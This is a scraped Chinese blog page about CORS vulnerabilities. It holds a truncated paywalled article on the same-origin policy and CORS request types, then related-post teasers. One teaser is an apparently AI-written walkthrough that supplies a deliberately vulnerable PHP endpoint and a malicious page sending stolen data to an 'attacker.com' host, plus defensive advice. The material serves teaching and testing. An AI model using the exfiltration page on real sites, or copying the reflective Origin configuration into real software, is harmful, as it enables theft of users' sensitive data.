CORS漏洞原理分析

最新推荐文章于 2025-10-21 18:17:20 发布
原创 最新推荐文章于 2025-10-21 18:17:20 发布 · 5.9k 阅读 · 24 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了CORS跨域资源共享的原理,分析了CORS漏洞的成因,展示了攻击流程,并提供了相应的防御措施。重点讨论了CORS与SOP的区别,以及如何通过正确配置CORS头部字段防止信息泄露。

CORS跨域漏洞原理分析

CORS全称为Cross-Origin Resource Sharing即跨域资源共享,用于绕过SOP(同源策略)来实现跨域资源访问的一种技术。而CORS漏洞则是利用CORS技术窃取用户敏感数据。以往与CORS漏洞类似的JSONP劫持虽然已经出现了很多年,但由于部分厂商对此不够重视导致其仍在不断发展和扩散。

在这里插入图片描述
美创安全实验室近期监控到全国各地类似于JSONP劫持或CORS漏洞引发的CSRF防御崩溃案例不断增多故在此单独出一篇针对CORS漏洞原理及防御方法的文章,希望看官们好好保护自己的系统免受此种攻击威胁。

0x01 CORS及SOP简介

对CORS的介绍要从浏览器的同源策略开始说起,SOP全称为Same Origin Policy即同源策略,该策略是浏览器的一个安全基石,同源策略规定:不同域的客户端脚本在没有明确授权的情况下,不能读写对方的资源。简单来说同源策略就是浏览器会阻止一个源与另一个源的资源交互。可以试想一下,如果没有同源策略,当你访问一个正常网站的时候又无意间打开了另一个恶意网站,恶意网站会从你刚刚访问的正常网站上窃取你全部的信息。

SOP是一个很好的策略,在SOP被提出的时期,大家都默默地遵守着这个规定,但随着WEB应用的发展,有些网站由于自身业务的需求,需要实现一些跨域的功能能够让不同域的页面之间能够相互访问各自页面的内容。为了实现这个跨域需求,聪明的程序员想到了一种编码技术JSONP,该技术利用从客户端传入的json格式的返回值,在服务器段调用该接口处事先以定义函数的方式定义好json格式里参数值,并加载script标签调用该函数实现跨域。由此可见JSONP虽然好但他并非是在协议层面解决跨域问题,所以出现了很多安全问题。为了能更安全的进行跨域资源访问,CORS诞生了。

CORS是H5提供的一种机制,WEB应用程序可以通过在HTTP报文中增加特定字段来告诉浏览器,哪些不同来源的服务器是有权访问本站资源。

0x02 CORS跨域原理及漏洞成因

浏览器将CORS请求分成两类:简单请求(simple request)和非简单请求(not-so-simple request)。只要同时满足以下两个条件就属于简单请求否则属于非简单请求,①请求方法是(HEAD,GET,POST)三种之一;②HTTP的头信息不超出(Accept,Accept-Language,Content-Language,Lat-Event-ID,Content-Type)这几种字段。

对于简单请求,大致流程是浏览器发现这一次向服务器提交的请求是简单请求,所以自动在头信息中增加了一个Origin的字段,用来表示这次的请求来自哪个域。当服务器接收到请求后发现Origin字段指定的域名在许可范围内,服务器会在响应包中增加三个与CORS相关的字段,Access-Control-Allow-Origin、Access-Control-Allow-Credentials、Access-Control-Expose-Headers。其中Access-Control-Allow-Origin字段是必须存在的,它的值可能是Origin字段的值或者是一个通配符“*”,表示可以接受任意域名的请求,当然大部分服务器如果配置了通配符的话,信息

最低0.47元/天 解锁文章
漏洞挖掘】——37、CORS攻防原理
Fly_鹏程万里
06-06 165
CORS(Cross-Origin Resource Sharing)即跨源资源共享,CORS是W3C出的一个标准,其思想是使用自定义的HTTP头部让浏览器与服务器进行沟通,因为开发者需要通过跨域获取资源。
实战分析和精华总结:CORS跨域资源共享漏洞数据劫持、复现、分析、利用及修复过程
代码讲故事
12-03 2179
实战分析和精华总结:CORS跨域资源共享漏洞数据劫持、复现、分析、利用及修复过程。 CORS跨域资源共享漏洞与JSONP劫持漏洞类似,都是程序员在解决跨域问题中进行了错误的配置。攻击者可以利用Web应用对用户请求数据包的Origin头校验不严格,诱骗受害者访问攻击者制作好的恶意网站,从而跨域获取受害者的敏感数据,包括转账记录、交易记录、个人身份证号信息、订单信息等等。
常见的Web漏洞——CORS
江左盟的博客
06-05 3260
渗透做了多年的朋友都知道,大洞小洞都是漏洞。因此也学习、沉淀一下以前没重视的漏洞CORS漏洞原理、检测和利用方法。
CORS漏洞
秋水的博客
09-20 7141
CORS简介 什么是CORSCORS是一个w3c标准、全称是"跨域资源共享"(Cross-origin resource sharing) 因为出于安全的考虑, 浏览器不允许Ajax调用当前源之外的资源.,即浏览器的同源策略 但一个请求url的协议、域名、端口三者之间任意一个与当前页面不同即为跨域、它允许阅览器向跨源服务器发送XMLHttpRequest请求,从而克服AJAX只能同源...
漏洞到加固,一次完整的CORS跨域漏洞修复指南
最新发布
虽非技冠群英首,愿与同道共长歌; 大鹏一日同风起,扶摇直上九万里;
10-21 1261
漏洞到加固,一次完整的CORS跨域漏洞修复指南
漏洞原理 | CORS跨域学习篇
2301_80127209的博客
03-13 1299
Cors允许浏览器向跨域服务器发出XmlHttpRequest请求,COSRS和JSONP的区别:CORS是JSONP的升级版,JSONP只能通过get方式请求,CORS支持get,post,head请求。从而证明了是存在cors跨域漏洞的。(1)不要配置”Access-Control-Allow-Origin”为通配符”*”,而且更重要的是,要严格校验来自请求数据数据包中的”Origin”的值。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
Cors漏洞详解
热门推荐
Askshhbs的博客
04-26 1万+
Cors介绍 Cors全称"跨域资源共享"(Cross-origin resource sharing),Cors的出现是用来弥补SOP(同源策略)的不足。在当时SOP有些限制了网页的业务需求,不能够使不同域的网页互相访问,因此提出了Cors:用于绕过SOP(同源策略)来实现跨域资源访问的一种技术。 Cors漏洞就是攻击者利用Cors技术来获取用户的敏感数据,从而导致用户敏感信息泄露。 漏洞原理 Cors请求可分为两类,简单请求和非简单请求。所谓简单请求,就是请求方式为GET,POST,HEAD这三
漏洞原理 | CORS跨域学习
2401_84466227的博客
04-22 608
CORS(Cross-Origin Resource Sharing,跨域资源共享)是一种网络浏览器技术规范,用于绕过浏览器的同源策略(SOP),允许网页脚本能够向不同源的服务器发起请求,从而实现跨域访问。CORS 可以使网页从一个域名请求另一个域名的资源,而不受同源策略的限制。同源策略(Same-Origin Policy)是Web安全的核心基石,规定了一个源的脚本在默认情况下只能读取相同源的网络资源。源的定义包括三个部分:协议、域名和端口。只有当这三者完全相同,两个URL才属于同一个源。
CORS Scanner工具
02-21
CORS Scanner工具的工作原理如下: 1. 扫描目标网站:该工具会自动遍历指定的网站URL,模拟各种可能的跨域请求,包括GET、POST、PUT等HTTP方法。 2. 分析响应头:在发送请求后,CORS Scanner会检查服务器返回的...
CORS跨域资源共享漏洞
墨鱼菜鸡
01-16 381
目录 CORS跨域资源共享 简单跨域请求 非简单请求 CORS的安全问题 有关于浏览器的同源策略和如何跨域获取资源,传送门——>浏览器同源策略和跨域的实现方法 同源策略(SOP)限制了应用程序之间的信息共享,并且仅允许在托管应用程序的域内共享。这有效防止了系统机密信息的泄露。但与此同时,...
Cors漏洞
saber的博客
10-30 876
Cors漏洞就是攻击者利用Cors技术来获取用户的敏感数据,从而导致用户敏感信息泄露;Cors请求可分为两类
CORS跨域资源共享漏洞原理与挖掘方法
seek_2022的博客
08-06 5636
本文介绍了CORS漏洞原理、靶场搭建方法、漏洞挖掘方法、自动化扫描工具、及CORS漏洞的修复建议,希望对大家学习渗透测试有一定的帮助。
生命在于学习——Cors漏洞
易水哲的博客
09-05 2670
Cors漏洞的学习笔记记录。
【安全漏洞CORS(跨域资源共享)
weixin_42925623的博客
11-22 4146
【安全漏洞CORS(跨域资源共享)
Web渗透:CORS漏洞
WolvenSec的博客
07-21 1258
这边的域特指同源策略中的“域”,在浏览器安全中,同源(Same-Origin)策略中的“域”指的是:协议 + 域名 + 端口跨域其实就是不同源的网页想拥有对方的权限资源,此时需要进行跨域资源获取。
CORS漏洞利用检测和利用方式
weixin_30245867的博客
07-21 5983
  CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求。 检测方式:   1.curl访问网站     curl https://www.huasec.com -H "Origin: https://test.com" -I   检查返回包的 Access-C...
CORS 漏洞介绍
ttyy1112的专栏
03-24 1203
是一种允许浏览器跨域访问资源的机制。它通过 HTTP 头来定义哪些外部源可以访问资源。如果配置不当,CORS 可能导致安全漏洞,如敏感数据泄露或未授权访问。CORS 漏洞通常源于配置不当,如过于宽松的或未验证Origin头。通过严格限制允许的域、验证请求头、限制暴露的头信息等方法,可以有效防止 CORS 漏洞
浅谈cors漏洞
weixin_63920195的博客
08-29 876
攻击者创建恶意网页并使用JavaScript构造跨域请求的poc(一般是获取敏感信息)origin 是源的意思 如果可控 并且返回包会出现以下两个字段。如果cors配置不当(检验不严格 只是简单校验是否包含该域名)如果cors需要绕过的话(子域名接管绕过)还要在poc设置。由于同源长策略 一些网站要实现跨域来共享资源的话。然后将获取的数据显发送回攻击者控制的服务器。头为服务器信任的域或子域。诱骗受害者访问该恶意网页。需要通过设置cors
CORS漏洞挖掘
qq_22132931的博客
02-14 602
CORS漏洞挖掘
CORS跨域资源共享漏洞复现
08-13
<think>嗯,用户想复现CORS跨域资源共享漏洞进行安全测试或学习。这个问题涉及Web安全领域,需要结合漏洞原理和实操步骤来解答。 用户可能是个安全研究员或渗透测试学习者,从"复现"和"渗透测试"等关键词能看出ta需要实操性指导。之前引用的资料里提到CORS漏洞常由错误配置引起,比如过度宽松的Access-Control-Allow-Origin设置,这点需要重点强调。 参考引用[4]特别指出不能仅凭Access-Control-Allow-Origin:*就判断漏洞存在,说明用户可能对漏洞判断存在误区。应该提醒ta注意凭证携带场景下的差异,比如配置为*时浏览器会拒绝带cookie的请求。 复现环境搭建是关键步骤。考虑分三层说明:后端漏洞配置(PHP/Node.js示例)、恶意页面构造、漏洞验证逻辑。引用[3]提到27.5%的网站存在CORS误配置,可以强调测试时关注Access-Control-Allow-Credentials头的重要性。 最后要补充防御建议,引用[5]提到很多人因图方便直接用默认配置导致漏洞,这点特别值得提醒开发人员。防御部分考虑区分开发人员和安全测试者的不同关注点。 用户可能还会关心如何自动化检测,正好引用[3]提到开源工具,可以推荐CORS-Scanner之类的方案。不过当前问题聚焦复现,工具部分放在最后简要提及即可。 整个思考过程需确保:所有技术术语用中文,数学公式用$包裹,代码块单独标注,相关漏洞原理用行内公式如$HTTP$请求响应过程。最后按系统指令生成三个延伸问题,覆盖漏洞挖掘、修复和实战场景。</think>以下是根据你的需求整理的CORS跨域漏洞复现步骤,结合渗透测试场景: --- ### **CORS漏洞复现步骤** #### **1. 搭建漏洞环境** **后端配置(PHP示例)** ```php <?php // 漏洞点:未校验Origin来源,直接反射请求头中的Origin值 header("Access-Control-Allow-Origin: " . $_SERVER['HTTP_ORIGIN']); header("Access-Control-Allow-Credentials: true"); // 允许携带凭证 // 模拟敏感数据接口 if(isset($_COOKIE['session'])) { echo json_encode(["user" => "admin", "email" => "admin@example.com"]); } ?> ``` #### **2. 构造恶意页面** ```html <!DOCTYPE html> <html> <body> <script> function exploit() { // 关键步骤:跨域请求目标站点(需诱导用户访问此页面) fetch('http://vuln-site.com/api/sensitive_data', { credentials: 'include' // 携带用户Cookie }) .then(response => response.json()) .then(data => { // 将窃取的数据发送到攻击者服务器 fetch('http://attacker.com/steal?data=' + JSON.stringify(data)); }); } exploit(); </script> </body> </html> ``` #### **3. 漏洞验证流程** - **触发条件**:用户登录`vuln-site.com`后访问恶意页面 - **攻击效果**: - 恶意脚本跨域读取`api/sensitive_data`接口的敏感数据 - 数据被发送至`attacker.com/steal`(攻击者服务器) #### **4. 关键漏洞配置分析** | **错误配置类型** | **风险示例** | |------------------------|---------------------------------------| | 动态反射Origin | `Access-Control-Allow-Origin: evil.com` | | 固定为`*`但需凭证 | `Access-Control-Allow-Origin: *` + `Allow-Credentials: true`[^4] | | 宽松的子域名匹配 | `Access-Control-Allow-Origin: *.example.com`(可被`x.example.evil.com`利用) | --- ### **渗透测试注意事项** 1. **凭证验证** - 仅当响应头包含`Access-Control-Allow-Credentials: true`时,浏览器才会发送Cookie[^2]。 - 若服务端配置`Access-Control-Allow-Origin: *`,浏览器将**拒绝携带凭证**的请求[^4]。 2. **Origin校验漏洞** - 漏洞核心:服务端未验证`Origin`头是否属于合法域名,直接反射回响应头[^5]。 - 测试方法:修改请求中的`Origin`头,观察响应是否动态反射该值。 3. **漏洞利用限制** - 需要诱导已认证用户访问恶意页面(类似CSRF攻击场景)[^2]。 - 敏感接口需存在未授权访问风险(如依赖Cookie认证)。 --- ### **防御方案** 1. **严格校验Origin白名单** ```php $allowed_origins = ["https://trusted.com"]; if (in_array($_SERVER['HTTP_ORIGIN'], $allowed_origins)) { header("Access-Control-Allow-Origin: " . $_SERVER['HTTP_ORIGIN']); } ``` 2. **避免动态反射Origin** 禁止未经验证的`Origin`值直接返回在响应头中[^3]。 3. **最小化凭证使用** 非必要场景不设置`Access-Control-Allow-Credentials: true`。 --- ### **自动化检测工具** - **CORS-Scanner**:扫描错误配置(如`*`+凭证、子域名通配符滥用)[^3] - **Burp Suite插件**:`CORS Scanner`模块可自动化探测反射型Origin漏洞 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值